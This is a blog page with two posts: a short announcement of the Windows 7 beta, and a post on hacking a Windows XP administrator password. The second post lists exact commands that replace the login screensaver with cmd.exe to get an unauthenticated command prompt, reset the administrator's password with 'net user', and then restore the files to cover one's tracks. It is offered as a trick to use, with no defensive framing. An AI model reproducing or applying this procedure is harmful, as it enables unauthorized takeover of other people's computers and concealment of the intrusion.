Windows tips, Registry Hacks, Network security and Linux tips
RSS icon Email icon Home icon
  • Windows 7 beta is now available!

    Posted on March 11th, 2009 admin No comments

    Hey Everyone at AGeniusBlog,

    I know this might be quite old, but I though I’d share this with others that are uninformed..

    New Features, and New Design!

    New Features, and New Design!

    Well Simply Windows 7 Is the upgarde of Vista (6) which has alot of fixes that Vista couldn’t handle, unless Vista comes out with a new service pack.

    Whats New? Check here

    The Requirements are basically the same as Vista, nothing much different there.

    Please note that this is in beta! and it is still upgrading.

    Als, you will need a freshly formatted system without an OS!

    Thanks, and Happy Downloading

    AGeniusBlog Team

    If you liked this post, please buy me a coffee! Donations will be VERY much appreciated!

  • How to Hack a Window XP Admins Password

    Posted on July 20th, 2008 admin 1 comment

    This is a cool little computer trick for Microsoft Windows trick I’ve picked up in my travels and decided to share it with you fine and ethical individuals =). Log in and go to your DOS command prompt and enter these commands exactly:

    cd\
    cd\windows\system32
    mkdir temphack
    copy logon.scr temphack\logon.scr
    copy cmd.exe temphack\cmd.exe
    del logon.scr
    rename cmd.exe logon.scr
    exit

    So what you just told windows to backup is the command program and the screen saver file. Then you edited the settings so when windows loads the screen saver, you will get an unprotected dos prompt without logging in. When this appears enter this command that’s in parenthesis (net user password). So if the admin user name is Doug and you want the password 1234 then you would enter “net user Doug 1234″ and now you’ve changed the admin password to 1234. Log in, do what you want to do, copy the contents of temphack back into system32 to cover your tracks.

    If you liked this post, please buy me a coffee! Donations will be VERY much appreciated!